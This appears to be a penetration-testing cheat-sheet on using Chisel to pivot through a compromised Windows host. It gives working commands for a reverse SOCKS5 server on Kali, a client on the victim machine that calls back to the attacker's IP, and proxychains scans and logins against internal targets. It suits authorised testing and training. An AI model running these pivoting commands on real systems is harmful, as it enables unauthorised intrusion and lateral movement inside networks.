Windows: Chisel

What is Chisel?

GitHub - jpillora/chisel: A fast TCP/UDP tunnel over HTTPGitHub

Chisel

Chisel is an awesome tool which can be used to quickly and easily set up a tunnelled proxy or port forward through a compromised system, regardless of whether you have SSH access or not. It's written in Golang and can be easily compiled for any system (with static release binaries for Linux and Windows provided). In many ways it provides the same functionality as the standard SSH proxying / port forwarding we covered earlier; however, the fact it doesn't require SSH access on the compromised target is a big bonus.

Download the latest release and gunzip it:

Releases · jpillora/chiselGitHub

chisel

You must have an appropriate copy of the chisel binary on both the attacking machine and the compromised server. Copy the file to the remote server with your choice of file transfer method.

Usage

On Kali, append the following line to /etc/proxychains4.conf:

socks5 127.0.0.1 1080

On Kali, set up a Chisel server on port 8000:

chisel server --port 8000 --socks5 --reverse

Transfer chisel.exe to the compromised Windows machine. On that machine, create a SOCKS5 reverse proxy:

.\chisel.exe client --max-retry-count 1 <kali_ip>:8000 R:socks

At this stage, we can reach our target by prepending proxychains -q to every command. For instance:

proxychains -q nmap -sC -sV <target_ip>
proxychains -q ssh <username>@<target_ip>
proxychains -q mysql -u <username> -h <target_ip>

Reference

pivoting with chisel

pivoting with chisel - lukasec